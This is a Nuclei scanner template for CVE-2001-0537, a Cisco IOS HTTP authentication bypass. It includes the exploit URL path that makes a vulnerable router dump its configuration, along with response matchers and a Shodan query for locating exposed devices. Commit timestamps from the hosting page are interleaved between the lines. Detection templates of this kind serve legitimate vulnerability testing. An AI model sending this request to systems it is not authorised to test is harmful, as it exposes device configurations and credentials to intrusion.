nuclei-templates/http/cves/2001/CVE-2001-0537.yaml

42 lines
1.2 KiB
YAML
Raw Normal View History

2023-06-12 12:36:50 +00:00
id: CVE-2001-0537
info:
2023-06-20 09:16:12 +00:00
name: Cisco IOS HTTP Configuration - Authentication Bypass
2023-06-12 12:36:50 +00:00
author: DhiyaneshDK
2023-06-12 12:38:46 +00:00
severity: medium
2023-06-20 09:16:12 +00:00
description: |
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
2023-06-12 12:36:50 +00:00
reference:
- https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936
- https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
2023-06-20 09:16:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2001-0537
2023-06-12 12:36:50 +00:00
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
cve-id: CVE-2001-0537
cwe-id: CWE-287
cvss-score: 5.0
metadata:
max-request: 1
2023-06-20 09:16:12 +00:00
verified: true
2023-06-12 12:36:50 +00:00
shodan-query: product:"Cisco IOS http config" && 200
2023-07-04 08:28:03 +00:00
tags: cve,cve2001,cisco,ios,auth-bypass
2023-06-12 12:36:50 +00:00
http:
- method: GET
path:
- '{{BaseURL}}/level/16/exec/show/config/CR'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'service config'
- 'Switch'
2023-06-19 12:31:31 +00:00
- 'default-gateway'
2023-06-12 12:36:50 +00:00
condition: and
- type: status
status:
- 200